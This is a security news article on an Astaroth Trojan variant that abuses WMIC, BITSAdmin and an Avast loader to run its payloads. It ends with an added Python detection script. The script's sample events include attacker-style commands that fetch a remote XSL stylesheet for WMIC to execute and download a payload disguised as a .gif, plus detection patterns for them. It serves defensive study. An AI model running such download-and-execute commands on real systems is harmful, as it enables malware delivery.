In a blog post, Cybereason's Nocturnus Research Team describes a new strain of the Astaroth Trojan that infects systems by abusing a process belonging to the antivirus software installed on them.
The Trojan is being distributed in spam campaigns in Brazil and Europe that had targeted thousands of computers as of December 2018. It arrives via malicious links and .7z archive attachments. The payload files it later downloads are stored disguised as GIF, JPEG or extensionless files to escape detection.
Once the attachment from a phishing or spam message is downloaded and opened, the malware uses the legitimate Microsoft Windows BITSAdmin tool to download the full payload from a command-and-control (C2) server.
During initialization the Trojan executes an XSL script, fetched from the C2 server and run through the Windows WMIC utility, to establish its connection with the C2 infrastructure. The script contains functions that help the malware evade antivirus software and retrieve the full payload.
An earlier version of Astaroth scanned the target computer for antivirus software and, if Avast Antivirus in particular was found, simply quit.
This modified version instead abuses a legitimate, signed Avast component (its Dynamic Link Library runtime) to load a malicious module inside one of Avast's own processes. This is "living off the land": rather than bringing its own tools, the malware runs its activity through binaries already present and trusted on the system (LOLBins) such as WMIC, BITSAdmin and the antivirus loader itself, so the malicious behaviour executes under signed, allowlisted executables and is less likely to be flagged by signature-based controls.
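The chain described above (WMIC rendering a remotely hosted XSL stylesheet, BITSAdmin pulling payloads stored under image-like or missing extensions, and an antivirus process loading a module from outside its install directory) is as much a detection problem as a malware problem. The following Python script is an added example written for this page, not Cybereason's code or any Avast tooling; it runs three simple rules over constructed, Sysmon-style process-creation and image-load records. The key=value event format, the Avast install path and loader process name, the host addresses and the file names are all assumptions made for the illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed telemetry modelled on Sysmon process-creation (EventID 1) and
# image-load (EventID 7) records, flattened to key=value lines. Paths, hosts
# and file names are invented; the Avast process name and path are assumed.
SAMPLE_EVENTS = [
    # 1. WMIC told to render a remotely hosted XSL stylesheet (script execution)
    r'event=process_create image=C:\Windows\System32\wbem\WMIC.exe parent=C:\Windows\explorer.exe cmdline="wmic os get /format:\"http://198.51.100.7/v.xsl\""',
    # 2. BITSAdmin, spawned from WMIC, downloads a payload stored as a .gif
    r'event=process_create image=C:\Windows\System32\bitsadmin.exe parent=C:\Windows\System32\wbem\WMIC.exe cmdline="bitsadmin /transfer j1 /download /priority high http://198.51.100.7/p1 C:\Users\Public\Libraries\r1.gif"',
    # 3. The AV runtime loader picks that file up as a module
    r'event=image_load image="C:\Program Files\AVAST Software\Avast\aswrundll.exe" module=C:\Users\Public\Libraries\r1.gif',
    # 4-6. Benign look-alikes that must not fire
    r'event=process_create image=C:\Windows\System32\wbem\WMIC.exe parent=C:\Windows\System32\cmd.exe cmdline="wmic os get caption"',
    r'event=process_create image=C:\Windows\System32\bitsadmin.exe parent=C:\Windows\System32\cmd.exe cmdline="bitsadmin /transfer upd /download /priority normal https://updates.example.com/patch.msi C:\Windows\Temp\patch.msi"',
    r'event=image_load image="C:\Program Files\AVAST Software\Avast\aswrundll.exe" module="C:\Program Files\AVAST Software\Avast\aswEngine.dll"',
]

# key=value pairs; a value is either a double-quoted string (with \" escapes)
# or a run of non-space characters.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# WMIC /format: pointing at an http(s) URL or a UNC path = remote XSL execution
REMOTE_XSL_RE = re.compile(r'/format\s*:\s*"?\s*(?:https?://|\\\\)', re.IGNORECASE)
# Extensions used to disguise payloads, plus "no extension at all"
DISGUISE_EXTS = {'.gif', '.jpg', '.jpeg', '.png', '.bmp', ''}
# Assumed Avast install directory; modules Avast loads from elsewhere are suspect,
# except the Windows system tree, which every process legitimately loads from.
AV_DIR = r'C:\Program Files\AVAST Software\Avast'.lower() + '\\'
TRUSTED_MODULE_DIRS = (AV_DIR, 'c:\\windows\\')


def parse_event(line):
    """Turn one key=value line into a dict, unquoting quoted values."""
    fields = {}
    for key, raw in FIELD_RE.findall(line):
        if raw.startswith('"'):
            raw = raw[1:-1].replace(r'\"', '"')
        fields[key] = raw
    return fields


def check_process_create(ev):
    """Return a rule name for a suspicious process creation, else None."""
    image = PureWindowsPath(ev.get('image', '')).name.lower()
    cmd = ev.get('cmdline', '')
    if image == 'wmic.exe' and REMOTE_XSL_RE.search(cmd):
        return 'wmic_remote_xsl'
    if image == 'bitsadmin.exe' and re.search(r'/transfer\b', cmd, re.IGNORECASE):
        # bitsadmin /transfer <job> [flags] <remote-url> <local-file>: the last
        # argument is the destination on disk
        tokens = cmd.split()
        dest = tokens[-1] if tokens else ''
        if PureWindowsPath(dest).suffix.lower() in DISGUISE_EXTS:
            return 'bitsadmin_disguised_payload'
    return None


def check_image_load(ev):
    """Flag an Avast process loading a module from outside trusted directories."""
    image = ev.get('image', '').lower()
    module = ev.get('module', '').lower()
    if image.startswith(AV_DIR) and not any(module.startswith(d) for d in TRUSTED_MODULE_DIRS):
        return 'av_process_loads_foreign_module'
    return None


def scan(lines):
    """Run the rules over every line; return (line index, rule) for each hit."""
    findings = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        if ev.get('event') == 'process_create':
            rule = check_process_create(ev)
        elif ev.get('event') == 'image_load':
            rule = check_image_load(ev)
        else:
            rule = None
        if rule:
            findings.append((idx, rule))
    return findings


if __name__ == '__main__':
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f'{rule}: {SAMPLE_EVENTS[idx]}')
```

The three rules are deliberately narrow so that the benign WMIC, BITSAdmin and Avast events in the sample do not fire; a real deployment would add the parent-process relationship (BITSAdmin spawned by WMIC is itself a strong signal) and, for the image-load rule, key on the code-signing fields Sysmon records for loaded modules rather than on directory alone.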
"As we enter 2019, we anticipate that the use of WMIC and other LOLbins will increase. Because of the great potential for malicious exploitation inherent in the use of LOLbins, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines," said security researchers from Cybereason.